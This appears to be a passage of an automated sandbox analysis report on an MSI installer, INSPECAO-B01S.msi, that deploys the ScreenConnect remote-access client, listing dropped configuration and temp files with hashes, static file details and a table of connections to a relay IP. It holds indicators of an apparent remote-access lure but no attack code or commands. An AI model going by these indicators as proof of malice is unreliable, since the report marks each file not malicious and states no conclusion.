Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-xkznvd-relay.screenconnect.com=147.75.63.168-27%2f10%2f2024%2011%3a01%3a17</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\1ot0kljn.newcfg

Process:	C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	584
Entropy (8bit):	5.043656912308449
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONldAY8+iLC/vXbAa3xT:2dL9hK6E46YPRd3yIvH
MD5:	8FDACC4D87DBC9DFD47AA69A86E04281
SHA1:	0F73E9F9FE56D4C96656C5BD58FB9BA4F5CA686D
SHA-256:	332501C21EDE52D2D5504B6C842E07F3559E08411B4CE9B092BB09CA692FBC68
SHA-512:	E2BFE360C747B4489E59EF230918E1B668C035B924AA2C71570C7B79C1E66469DD70FB77376102767DA60ED68C571AC7F0C12B1F8DDF915D5E6CA80DD3C14BA3
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-xkznvd-relay.screenconnect.com=147.75.63.168-27%2f10%2f2024%2011%3a02%3a48</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\3mrf34qd.newcfg

Process:	C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	584
Entropy (8bit):	5.04180705706623
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONldAY8+iLPm/vXbAa3xT:2dL9hK6E46YPRd3yUvH
MD5:	8C9E9B27925C5FFE32EAF6732D601B66
SHA1:	E0D7547285758CE0D45C23E89A7D78C3DC4DC129
SHA-256:	442195EB1CB640436D2F561E102D17B11E89EB5AAA5390832BBFD43B39BCDF8F
SHA-512:	76079D73C9C17C59CBA68A999792559C21616115F60AC86937BB57CCB75CA525A7DFFB75392A671364ADC45783C76B729160EA19AB0393870D79A32A40148933
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-xkznvd-relay.screenconnect.com=147.75.63.168-27%2f10%2f2024%2011%3a02%3a08</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\blegu5ad.newcfg

Process:	C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	584
Entropy (8bit):	5.0411037982490905
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONldAY8+iFz05/vXbAa3xT:2dL9hK6E46YPRd3w0RvH
MD5:	49905342A89DE78BDF52135CDF976607
SHA1:	17F062A0B41C63C537D5D22327119C79D8A7F3BB
SHA-256:	D03A0E5879C8494C54B2D837CF70C6A8FBE914EF43F541E0C570ACDDA2CA7B7F
SHA-512:	710ADC9734B2F612597F54DE760315656FCE0CD1C9E8B18A1E08768341BF8361E23DE1BBEDD4AF988AE164AC9E0D8C244119C4B8E66C28879ECF2F59E2C57A50
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-xkznvd-relay.screenconnect.com=147.75.63.168-27%2f10%2f2024%2011%3a01%3a14</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\cksz2bob.newcfg

Process:	C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	584
Entropy (8bit):	5.039253943006872
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONldAY8+iFj/vXbAa3xT:2dL9hK6E46YPRd3SvH
MD5:	60D96EB877FCC4789BAEDC81FC74897B
SHA1:	947B662C20AAE2C85AE3DA7E5191D98C29C078CA
SHA-256:	199EC99920ED9C1E5A1AFE9F5EA442156BFC928D5C9783D448DA7BF3FD9C1721
SHA-512:	FA7C382E2A1F170A4E59CA2DEF6BE8B09CC33DCFA354F04B968667263B071ED8CCC65AFB28C49C0D6E20586E791A38FE279D6F522C9E664579E06093CA91F3E8
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-xkznvd-relay.screenconnect.com=147.75.63.168-27%2f10%2f2024%2011%3a01%3a11</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\hfe01imn.newcfg

Process:	C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	584
Entropy (8bit):	5.04019272123601
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONldAY8+iFy/vXbAa3xT:2dL9hK6E46YPRd3RvH
MD5:	18C4B6F773CABB481114EB1229567510
SHA1:	C8211B81DD599C02B35AFCF3B6B41DBCC07B9096
SHA-256:	481E4C1312043DF42BD91F25C45502BF3962DCE4ECFBD416A80B0609B699D3B2
SHA-512:	A7548994E81774E4E4CA3412C4AB7BF04139C06D06D1D553C93E11385C62523789C0FFE9465B99D064A1752928E37F74C155B83608EE5CE9325EC98BB9553D35
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-xkznvd-relay.screenconnect.com=147.75.63.168-27%2f10%2f2024%2011%3a01%3a21</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\jfhfu5lw.newcfg

Process:	C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	584
Entropy (8bit):	5.042805370954041
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONldAY8+iFpv/vXbAa3xT:2dL9hK6E46YPRd38vH
MD5:	166B279BE32760406C19022F2C44302B
SHA1:	5A2364D4EF18A02CC581EBA513FFEE125096C105
SHA-256:	08BDDF3F0FAB017B24DC9FD8B1F8B881391E921D05741299D642FA00F6A407D9
SHA-512:	83CD36ED9A1BC2197AF96F79434554F6F2E3866E29F353D78098D1EAED34DF191E14A1513597198A5D949D712E55F19B574C0F0BBD1194CC3DFFE761A3EF86AE
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-xkznvd-relay.screenconnect.com=147.75.63.168-27%2f10%2f2024%2011%3a01%3a57</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\qf3laj4y.newcfg

Process:	C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	584
Entropy (8bit):	5.043656912308449
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONldAY8+id/vXbAa3xT:2dL9hK6E46YPRd3+vH
MD5:	65808D93B0DFF096E7864916F42ADA9C
SHA1:	03A7932052A7377B7B471D6462599DFCC2A80A82
SHA-256:	BA40CDFF731BA42ECD25B0072F993E11E68FB5912FC9B07752A8F93E0041F527
SHA-512:	A51974800E427A3BC35642074844F5640D265DF4C238BAB693AD6EFCDCB66E59A3F1D48AED4C39F21DAF3A6FAF50C5805188DA0AC13356A0ACA4003712DE8C58
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-xkznvd-relay.screenconnect.com=147.75.63.168-27%2f10%2f2024%2011%3a03%3a26</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\rs24xzl1.newcfg

Process:	C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	584
Entropy (8bit):	5.042391715268791
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONldAY8+iLK/vXbAa3xT:2dL9hK6E46YPRd3ygvH
MD5:	711B94521655A1D3893E893EB0C3679E
SHA1:	1E4CC50FA364C53B55FC67EC427BB7626A1B81DB
SHA-256:	23C9B565550480BB60C28890F5B37DB6955B53C527B737F6CFE7A9F91788443C
SHA-512:	D2C8D107E51782150C77045474FDB083CB0540537042A805FF89EFF59945D64017CB54451AE11B53AEB862EE6ADD4239F6089B16CC86CE5C8A75CA67BA89FFAC
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-xkznvd-relay.screenconnect.com=147.75.63.168-27%2f10%2f2024%2011%3a02%3a26</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\user.config (copy)

Process:	C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	584
Entropy (8bit):	5.039253943006872
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONldAY8+iFj/vXbAa3xT:2dL9hK6E46YPRd3SvH
MD5:	60D96EB877FCC4789BAEDC81FC74897B
SHA1:	947B662C20AAE2C85AE3DA7E5191D98C29C078CA
SHA-256:	199EC99920ED9C1E5A1AFE9F5EA442156BFC928D5C9783D448DA7BF3FD9C1721
SHA-512:	FA7C382E2A1F170A4E59CA2DEF6BE8B09CC33DCFA354F04B968667263B071ED8CCC65AFB28C49C0D6E20586E791A38FE279D6F522C9E664579E06093CA91F3E8
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-xkznvd-relay.screenconnect.com=147.75.63.168-27%2f10%2f2024%2011%3a01%3a11</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\Temp\~DF000A2F18FE5F71DF.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.4137977574438754
Encrypted:	false
SSDEEP:	48:J4bu31veFXJZT50UuN+nyqcq56AduNSi4+idRxNLr7Qn3wiz2+Oo8rGAduNSIDM/:abXBTOjWHpofedh/+/z
MD5:	D7A8BD7E8363A57F97A78BB4BCB01E87
SHA1:	BC3EDA6B698031DCE784EBBCA78A5E5BC1B9384E
SHA-256:	B421E43CE814FDF645C7C0B8B0C5D47171B9445F65230AB7602C55F66870017C
SHA-512:	9EA55CE97B36280E92BD851E87517DC760E9202CB8613097267BBFB47F008D1119F4D6D6E82EC22B74AA58C07C1B03774C11BD50CD99CA6D0C92AC621F1AA523
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF019CE7C0A5B2437B.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.0726981486420094
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOEYclVWxUrBlXSVky6lV1:2F0i8n0itFzDHFEYjUrl/
MD5:	47C891582E304FA1D6CF8AB46C832F2A
SHA1:	6D38C9090542C887988287F527CAC63AFA4DE60D
SHA-256:	2147513B9015806A613CCB458693409B302701FB5CC92BE994DE558EF06453A2
SHA-512:	C376F6F91468E354E94AD9706CE5C69F72315B75CAEE42FBB878994D02EBFFEEB5D78175D62557E8F5F327B23B2E39305C35871F660FD8D02DCAF10864F7AE8F
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF2494A6BC44E42AF5.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF4CA68FC81904992E.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.789631956260909
Encrypted:	false
SSDEEP:	48:38PhDuRc06WXJS/T5mN+nyqcq56AduNSi4+idRxNLr7Qn3wiz2+Oo8rGAduNSID+:2hD1J/TsWHpofedh/+/z
MD5:	03D56FFAA10A5A406A3D3AC9E162D5E2
SHA1:	E0542DE137FDDB1821079B26563B28EB64E10B9A
SHA-256:	A88E6E057AA15425DD78A091D2CBCAF9BF152E5A63F756B1D6B766FBCF12419B
SHA-512:	6FA628078449AB9C09D7ECFE177ED9DB4B8BC3383092C7576EB236489222D4DD32C17AC7D3EA56677ADA969C361834BCAB65DD1CD24BBD473BD320E2E3C231AD
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF7CFD00D2B9CF1245.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	0.231053373180817
Encrypted:	false
SSDEEP:	48:koyyDBAduNS3qcq56AduNSi4+idRxNLr7Qn3wiz2+Oo8ryUN+:bLxpofedh/+NM
MD5:	4FA76FF38B553798C9EA62B3D1D40D3A
SHA1:	6034F7CC5A76465F22FC80B3DF811AFE298B0B0A
SHA-256:	8D71026E3A94FAB5305A73D59EB604BB36FAEA5B1104C2EFA46329253CED751A
SHA-512:	0F1F97CB5A25A6FF8B793BD6CAD8B50EB98711E814BBE23177A1C2D56999CC82CA581EF4DAB4F2871671EA4DC7CC152E42152D578BA7FCE9033B2251C78A5036
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF7F7BBB5808F7A4BF.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF81A79EFFA436931A.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA1F2F1BCA8A5D13B.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.789631956260909
Encrypted:	false
SSDEEP:	48:38PhDuRc06WXJS/T5mN+nyqcq56AduNSi4+idRxNLr7Qn3wiz2+Oo8rGAduNSID+:2hD1J/TsWHpofedh/+/z
MD5:	03D56FFAA10A5A406A3D3AC9E162D5E2
SHA1:	E0542DE137FDDB1821079B26563B28EB64E10B9A
SHA-256:	A88E6E057AA15425DD78A091D2CBCAF9BF152E5A63F756B1D6B766FBCF12419B
SHA-512:	6FA628078449AB9C09D7ECFE177ED9DB4B8BC3383092C7576EB236489222D4DD32C17AC7D3EA56677ADA969C361834BCAB65DD1CD24BBD473BD320E2E3C231AD
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFB45835977A3D2491.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFBE7A72BF1EFE926A.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFC6A6368BD6B77C5A.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.4137977574438754
Encrypted:	false
SSDEEP:	48:J4bu31veFXJZT50UuN+nyqcq56AduNSi4+idRxNLr7Qn3wiz2+Oo8rGAduNSIDM/:abXBTOjWHpofedh/+/z
MD5:	D7A8BD7E8363A57F97A78BB4BCB01E87
SHA1:	BC3EDA6B698031DCE784EBBCA78A5E5BC1B9384E
SHA-256:	B421E43CE814FDF645C7C0B8B0C5D47171B9445F65230AB7602C55F66870017C
SHA-512:	9EA55CE97B36280E92BD851E87517DC760E9202CB8613097267BBFB47F008D1119F4D6D6E82EC22B74AA58C07C1B03774C11BD50CD99CA6D0C92AC621F1AA523
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFDB40267D9917BE80.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.4137977574438754
Encrypted:	false
SSDEEP:	48:J4bu31veFXJZT50UuN+nyqcq56AduNSi4+idRxNLr7Qn3wiz2+Oo8rGAduNSIDM/:abXBTOjWHpofedh/+/z
MD5:	D7A8BD7E8363A57F97A78BB4BCB01E87
SHA1:	BC3EDA6B698031DCE784EBBCA78A5E5BC1B9384E
SHA-256:	B421E43CE814FDF645C7C0B8B0C5D47171B9445F65230AB7602C55F66870017C
SHA-512:	9EA55CE97B36280E92BD851E87517DC760E9202CB8613097267BBFB47F008D1119F4D6D6E82EC22B74AA58C07C1B03774C11BD50CD99CA6D0C92AC621F1AA523
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {87BA6F17-ED48-2213-B0B4-DE77D334918D}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
Entropy (8bit):	7.949102976609468
TrID:	Microsoft Windows Installer (60509/1) 57.88% ClickyMouse macro set (36024/1) 34.46% Generic OLE2 / Multistream Compound File (8008/1) 7.66%
File name:	INSPECAO-B01S.msi
File size:	8'249'344 bytes
MD5:	a41d8aa583e034822c084a74eac45268
SHA1:	03e24d97759f550f5b261e552e7321db478c2ff6
SHA256:	7a004abae96e562926d9af1cf9e323de387923c24a0a6779d343b64537c4cc1b
SHA512:	71c801134371ad7458e1bc023fb6f50b3aa01116b9316944d491254db29ba811b855ec194810320b5b106701234d207d31a264f15a3d73305792f22ca49fd1b0
SSDEEP:	98304:gEnXkHywo+EVhaecMUzG4uc96ob2KEnXkHywo+EVhaecMUCEnXkHywo+EVhaecMk:rZs6Uruc9XboZs6UJZs6UgZs6U
TLSH:	E586222133E88928E1B34B3AEC7655B4493ABD55EF22C16F63647D0D2931FC099A2737
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2024 12:01:12.832295895 CET	49730	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:12.832340002 CET	443	49730	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:12.832576990 CET	49730	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:13.761681080 CET	49730	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:13.761707067 CET	443	49730	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:13.761845112 CET	443	49730	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:15.870449066 CET	49733	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:15.870536089 CET	443	49733	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:15.870640039 CET	49733	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:15.873482943 CET	49733	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:15.873523951 CET	443	49733	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:15.873625994 CET	443	49733	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:18.752674103 CET	49735	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:18.752720118 CET	443	49735	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:18.752801895 CET	49735	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:18.754951000 CET	49735	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:18.754992962 CET	443	49735	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:18.755050898 CET	443	49735	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:22.808455944 CET	49738	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:22.808501959 CET	443	49738	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:22.808573961 CET	49738	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:22.811378002 CET	49738	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:22.811389923 CET	443	49738	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:22.811436892 CET	443	49738	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:28.736232042 CET	49745	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:28.736320972 CET	443	49745	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:28.736438036 CET	49745	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:28.738903999 CET	49745	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:28.738929033 CET	443	49745	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:28.739025116 CET	443	49745	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:39.034743071 CET	49746	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:39.034835100 CET	443	49746	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:39.034926891 CET	49746	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:39.037749052 CET	49746	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:39.037831068 CET	443	49746	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:39.037911892 CET	443	49746	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:57.251140118 CET	49747	443	192.168.2.4	147.75.63.168
Oct 27, 2024 12:01:57.251208067 CET	443	49747	147.75.63.168	192.168.2.4
Oct 27, 2024 12:01:57.251327038 CET	49747	443	192.168.2.4	147.75.63.168
